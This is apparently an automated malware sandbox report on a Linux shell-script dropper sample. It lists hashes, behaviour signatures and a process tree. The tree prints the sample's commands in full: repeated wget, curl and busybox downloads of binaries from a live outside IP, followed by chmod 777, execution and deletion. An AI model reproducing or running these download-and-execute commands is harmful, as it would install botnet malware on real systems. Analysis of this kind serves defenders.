Analysis
-
max time kernel
41s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
14-11-2024 02:53
Static task
static1
Behavioral task
behavioral1
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
-
Size
10KB
-
MD5
920017685299c34fe40ed0d31390a654
-
SHA1
15be0738ab44434517b3a1bb41d0ba9752f0da28
-
SHA256
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
-
SHA512
345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
-
SSDEEP
192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 1521 chmod 1625 chmod 1637 chmod 1593 chmod 1611 chmod 1655 chmod 1667 chmod 1605 chmod 1661 chmod 1533 chmod 1643 chmod 1649 chmod 1679 chmod 1527 chmod 1569 chmod 1587 chmod 1673 chmod 1515 chmod 1563 chmod 1575 chmod 1581 chmod 1631 chmod 1539 chmod 1545 chmod 1551 chmod 1599 chmod 1617 chmod 1557 chmod -
Executes dropped EXE 28 IoCs
Processes:
49irlYlhW1pQmwlDaVrLaKzYecToHyUObHqHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTyV565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42i7eUZodswPOZ3YHkvfHkejyH5tSnDy932lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPdvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cwgZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs1BSmB9KGuK6znFf5VBDep3VxMqq2wef23zS1yQbJJqsxutFfMd773H9H8eSVOHhHs3dbIzUor4CncpgQBrMSVS6lA6UObBDbUtCYRqysc6biA4IgoxzZzjEFUn82WVsduROTl3DQxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt49irlYlhW1pQmwlDaVrLaKzYecToHyUObHlZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOPdvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cwqHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTyV565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42i7eUZodswPOZ3YHkvfHkejyH5tSnDy932gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs1BSmB9KGuK6znFf5VBDep3VxMqq2wef23zxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztS1yQbJJqsxutFfMd773H9H8eSVOHhHs3dbIzUor4CncpgQBrMSVS6lA6UObBDbUtCYRqysc6biA4IgoxzZzjEFUn82WVsduROTl3DQioc pid Process /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 1516 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy 1522 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz 1528 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 1534 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 1540 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 1546 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 1552 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw 1558 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs 1564 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z 1570 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db 1576 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq 1582 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ 1588 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 1594 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH 1600 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD 1606 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP 1612 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw 1618 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy 1626 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz 1632 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 1638 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 1644 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs 1650 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z 1656 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 1662 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db 1668 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq 1674 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ 1680 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztrmwgetcurlbusyboxxBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dztwgetcurlbusyboxrmpid Process 1594 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 1595 rm 1658 wget 1659 curl 1660 busybox 1662 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt 1590 wget 1591 curl 1592 busybox 1663 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs curl File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db curl File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 curl File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw curl File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 curl File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs curl File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt curl File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq curl File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz curl File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy curl File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy curl File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq curl File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ curl File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP curl File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw curl File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD curl File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z curl File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 curl File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db curl File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z curl File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz curl File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH curl File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 curl
Processes
-
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh1⤵PID:1507
-
/bin/rm/bin/rm bins.sh2⤵PID:1508
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1509
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Writes file to tmp directory
PID:1513
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1514
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:1516
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1518
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1520
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1523
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1524
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1526
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1529
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1530
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1532
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1535
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1536
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1538
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1541
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1544
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1547
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1550
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1553
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1556
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1559
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1562
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1565
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1568
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1571
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1572
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1574
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1577
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1580
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1583
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1586
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1589
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1590
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1592
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1594
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1595
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1598
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1601
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1604
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1607
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1610
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1613
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1614
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1616
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1619
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1624
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1630
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:1631
-
-
